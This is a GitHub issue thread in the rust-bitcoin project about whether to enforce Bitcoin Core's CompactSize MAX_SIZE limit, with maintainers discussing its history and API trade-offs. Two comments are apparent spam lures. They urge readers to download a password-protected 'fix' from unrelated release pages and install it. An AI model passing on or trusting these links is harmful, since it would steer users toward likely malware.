### ISSUE TITLE
Look into `CompactSize` MAX_SIZE

### ISSUE THREAD

**Issue by tcharding** [rust-bitcoin/rust-bitcoin#3264]
In Bitcoin Core there is a `MAX_SIZE` variable `0x0200_0000` that we are not using.

Look into if we should be using/enforcing this limit. The thing that has confused me is that `MAX_SIZE` fits in a `u32` so why does `CompactSize` have the `0xFF` initial byte and 9 byte encoding for `u64`s.

Discovered while hacking on #3259

**Comment by apoelstra** [comment]
Yeah, it's very strange. This constant has been around since the days of Satoshi. In the BU/2x schism it was widely interpreted as a "32 meg maximum blocksize" which is incorrect on its face (the size of a block in bytes is never constrained by a compactsize encoding, though maybe in the p2p layer there are some limits) and also just a weird thing for people to think. If you are gonna hardfork you can change anything you want.

In 2021 the compactsize decoding logic was changed to allow bypassing the limit (because they started to reuse the compactsize encoding for non-size things like node service flags). So we may want to copy that logic as well.

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Kixunil** [comment]
Sounds like we should have both verifying and non-verifying methods.

**Comment by tcharding** [comment]
I emailed the dev mailing list and CC'd you guys, I don't know if I'm subscribed or able to send emails there after the switch to google groups though - I haven't been reading the list since then.

**Comment by apoelstra** [comment]
I can confirm that I see your message.

**Comment by tcharding** [comment]
Because of the CC or because its on the list?

**Comment by Kixunil** [comment]
One thing that annoys me though it probably cannot be solved cleanly is that we can produce invalid values (too large when serialized). Restricting to `u32` on deserialization side makes things so much easier though.

**Comment by apoelstra** [comment]
@Kixunil this is true across the board -- you can also produce transactions whose size exceeds 2^64, and then if you try to PSBT-serialize, say, that you'll go over the existing limit adding the length prefix.

With a 32-bit number this becomes more realistic in that you'll be able to do it on commodity hardware. But the code path is there nonetheless.

**Comment by Kixunil** [comment]
Yes, I'm aware of that. I'm mainly pointing out it's annoying. So we either allow producing invalid stuff in some cases or end up with an API that's horrible in some way.

**Comment by apoelstra** [comment]
Yep. I propose allowing the production of invalid stuff *specifically* where "invalid" means "too big somehow".

**Comment by tcharding** [comment]
I just stumbled on this while working on #5017, is this related in anyway to the 4,000,000 max vector size limit or did we make that limit up based on max block size of 4 meg wu? I'm a bit confused right now.

**Comment by apoelstra** [comment]
Historically they're unrelated (we just made up the MAX_VEC limit). But I think it's reasonable to use the same constant for both use cases, now that we have a `CompactSize` MAX_SIZE.
